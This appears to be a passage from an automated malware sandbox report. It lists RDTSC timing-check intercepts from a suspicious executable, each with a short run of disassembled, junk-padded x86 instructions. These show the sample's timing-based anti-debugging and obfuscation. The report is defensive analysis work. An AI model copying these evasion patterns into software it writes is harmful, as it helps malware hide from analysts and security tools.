                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300771 second address: 53007B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F29FC6B5CA1h 0x00000010 sub ax, 8266h 0x00000015 jmp 00007F29FC6B5CA1h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F29FC6B5C9Dh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007B5 second address: 53007BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007BB second address: 53007BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007BF second address: 53007DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e mov ecx, edx 0x00000010 pop edi 0x00000011 popad 0x00000012 mov dword ptr [esp], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, 79EC0F14h 0x0000001d mov cl, bh 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007DF second address: 53007FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bl, ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007FA second address: 5300862 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC524587h 0x00000008 and esi, 4963A50Eh 0x0000000e jmp 00007F29FC524589h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F29FC52457Eh 0x0000001c mov bh, cl 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F29FC52457Ah 0x00000026 mov dword ptr [esp], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 31C5E4D0h 0x00000031 mov bh, 7Dh 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300890 second address: 53008C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F29FC6B5CA6h 0x00000012 mov esi, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008C4 second address: 53008CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 3FDD17EEh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008CE second address: 53008DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC6B5C9Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008DD second address: 53008E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008E1 second address: 53008F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F29FC6B5CE7h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop ebx 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 530092E second address: 5300934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300934 second address: 5300938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300938 second address: 52F0045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007F29FC524587h 0x0000000f pop esi 0x00000010 jmp 00007F29FC524586h 0x00000015 leave 0x00000016 pushad 0x00000017 mov si, di 0x0000001a popad 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 xor ebx, ebx 0x00000024 cmp eax, 00000000h 0x00000027 je 00007F29FC5246DAh 0x0000002d mov dword ptr [esp], 0000000Dh 0x00000034 call 00007F2A01680711h 0x00000039 mov edi, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e call 00007F29FC524582h 0x00000043 pop ecx 0x00000044 pushfd 0x00000045 jmp 00007F29FC52457Bh 0x0000004a and ecx, 5015F23Eh 0x00000050 jmp 00007F29FC524589h 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0045 second address: 52F004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F004B second address: 52F004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F004F second address: 52F0065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC6B5C9Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0065 second address: 52F008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, bl 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F008B second address: 52F00AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D69Dh 0x00000007 mov edi, eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC6B5C9Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F00AB second address: 52F00BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F00BA second address: 52F0112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c pushad 0x0000000d mov ax, 56A3h 0x00000011 pushfd 0x00000012 jmp 00007F29FC6B5CA8h 0x00000017 sbb esi, 4F78A7E8h 0x0000001d jmp 00007F29FC6B5C9Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0112 second address: 52F0116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0116 second address: 52F011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F011A second address: 52F0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0120 second address: 52F0143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F29FC6B5CA1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0143 second address: 52F0157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov edx, 75BAF642h 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0157 second address: 52F0166 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0166 second address: 52F016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F016A second address: 52F0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0170 second address: 52F01A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC524586h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC52457Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F01D0 second address: 52F01D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F01D4 second address: 52F01DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F01DA second address: 52F024E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c call 00007F29FC6B5C9Dh 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F29FC6B5CA7h 0x0000001a xor ax, 881Eh 0x0000001f jmp 00007F29FC6B5CA9h 0x00000024 popfd 0x00000025 popad 0x00000026 inc ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29FC6B5C9Dh 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F024E second address: 52F029A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 59E2h 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test al, al 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F29FC52457Bh 0x00000015 and al, FFFFFFDEh 0x00000018 jmp 00007F29FC524589h 0x0000001d popfd 0x0000001e popad 0x0000001f je 00007F29FC52477Bh 0x00000025 pushad 0x00000026 mov di, C83Eh 0x0000002a pushad 0x0000002b mov ebx, 3571F2D8h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F029A second address: 52F02F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 lea ecx, dword ptr [ebp-14h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F29FC6B5CA6h 0x00000012 sbb cx, BD38h 0x00000017 jmp 00007F29FC6B5C9Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F29FC6B5CA8h 0x00000023 sbb si, 3798h 0x00000028 jmp 00007F29FC6B5C9Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F02F9 second address: 52F02FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0327 second address: 52F033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F033B second address: 52F0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0341 second address: 52F0345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0345 second address: 52F0349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F03C2 second address: 52F03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F03C8 second address: 52F03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F03CC second address: 52F043D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e mov dh, ch 0x00000010 pushfd 0x00000011 jmp 00007F29FC6B5CA9h 0x00000016 or ax, 2D76h 0x0000001b jmp 00007F29FC6B5CA1h 0x00000020 popfd 0x00000021 popad 0x00000022 jg 00007F2A6C7B3D04h 0x00000028 jmp 00007F29FC6B5C9Eh 0x0000002d js 00007F29FC6B5CF0h 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 mov bl, ah 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0E1D second address: 52E0E4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 jmp 00007F29FC52457Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F29FC524586h 0x00000013 push eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0E4C second address: 52E0E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC6B5CA0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0E67 second address: 52E0EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F29FC524586h 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 call 00007F29FC52457Eh 0x00000017 pushfd 0x00000018 jmp 00007F29FC524582h 0x0000001d and ax, 9F78h 0x00000022 jmp 00007F29FC52457Bh 0x00000027 popfd 0x00000028 pop eax 0x00000029 mov eax, edx 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx ebx, cx 0x00000033 pushfd 0x00000034 jmp 00007F29FC524588h 0x00000039 sub esi, 09C6C908h 0x0000003f jmp 00007F29FC52457Bh 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0EF9 second address: 52E0F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC6B5C9Fh 0x00000008 mov ecx, 0A32AA6Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F29FC6B5CA7h 0x0000001a and ecx, 56EE06AEh 0x00000020 jmp 00007F29FC6B5CA9h 0x00000025 popfd 0x00000026 mov si, 3F37h 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0FAA second address: 52E0FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 call 00007F29FC524580h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC52457Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0FD3 second address: 52E0FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0FD9 second address: 52E0FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0B6F second address: 52F0B74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0B74 second address: 52F0B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 3Dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29FC52457Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0B8B second address: 52F0BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, si 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F29FC6B5C9Ch 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0BC2 second address: 52F0BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0BC8 second address: 52F0BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ch, D8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0BDA second address: 52F0C05 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 08A0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, 5A480ECCh 0x0000000d popad 0x0000000e cmp dword ptr [7544459Ch], 05h 0x00000015 jmp 00007F29FC52457Bh 0x0000001a je 00007F2A6C61237Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0C05 second address: 52F0C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F29FC6B5CA1h 0x0000000a add esi, 6BFA0656h 0x00000010 jmp 00007F29FC6B5CA1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0CB7 second address: 52F0CE9 instructions: 0x00000000 rdtsc 0x00000002 call 00007F29FC524588h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push 5E4AD2E0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC52457Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0CE9 second address: 52F0CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0CEF second address: 52F0D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 2B094EC8h 0x0000000f pushad 0x00000010 mov edx, eax 0x00000012 popad 0x00000013 call 00007F2A6C6193E6h 0x00000018 push 753E2B70h 0x0000001d push dword ptr fs:[00000000h] 0x00000024 mov eax, dword ptr [esp+10h] 0x00000028 mov dword ptr [esp+10h], ebp 0x0000002c lea ebp, dword ptr [esp+10h] 0x00000030 sub esp, eax 0x00000032 push ebx 0x00000033 push esi 0x00000034 push edi 0x00000035 mov eax, dword ptr [75444538h] 0x0000003a xor dword ptr [ebp-04h], eax 0x0000003d xor eax, ebp 0x0000003f push eax 0x00000040 mov dword ptr [ebp-18h], esp 0x00000043 push dword ptr [ebp-08h] 0x00000046 mov eax, dword ptr [ebp-04h] 0x00000049 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000050 mov dword ptr [ebp-08h], eax 0x00000053 lea eax, dword ptr [ebp-10h] 0x00000056 mov dword ptr fs:[00000000h], eax 0x0000005c ret 0x0000005d jmp 00007F29FC52457Ah 0x00000062 sub esi, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushfd 0x00000068 jmp 00007F29FC52457Ah 0x0000006d add al, FFFFFF88h 0x00000070 jmp 00007F29FC52457Bh 0x00000075 popfd 0x00000076 jmp 00007F29FC524588h 0x0000007b popad 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0D49 second address: 52F0D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-1Ch], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0D61 second address: 52F0D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0D65 second address: 52F0D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0D69 second address: 52F0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0D6F second address: 52F0D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0D75 second address: 52F0D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0D79 second address: 52F0D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0DD4 second address: 52F0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC524584h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0DEC second address: 52F0E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 jmp 00007F29FC6B5CA0h 0x00000015 popad 0x00000016 je 00007F2A6C799808h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0E1F second address: 52F0E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0E23 second address: 52F0E40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0E40 second address: 52F0E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F29FC524583h 0x00000019 or ax, 156Eh 0x0000001e jmp 00007F29FC524589h 0x00000023 popfd 0x00000024 mov ax, AEF7h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53009A2 second address: 53009BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7E5610ADh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29FC6B5C9Fh 0x00000013 rdtsc
